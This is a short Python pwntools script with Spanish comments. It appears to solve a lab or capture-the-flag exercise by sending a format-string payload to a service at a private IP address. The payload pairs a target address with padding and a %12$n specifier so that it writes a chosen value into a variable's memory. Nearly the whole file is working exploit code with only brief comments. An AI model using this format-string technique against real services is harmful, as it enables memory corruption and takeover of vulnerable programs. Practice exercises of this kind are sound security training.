from pwn import *
p = remote('192.168.32.143', 1234)


exploit = ""
#Con argumento 12 nos encontramos nuestra variable.
#Solo necesitamos un padding igual al numero de bytes que queremos escribir en la variable.
exploit += "\xf4\x96\x04\x08%16930112x%12$n"

p.sendline(exploit)

print p.recvall()
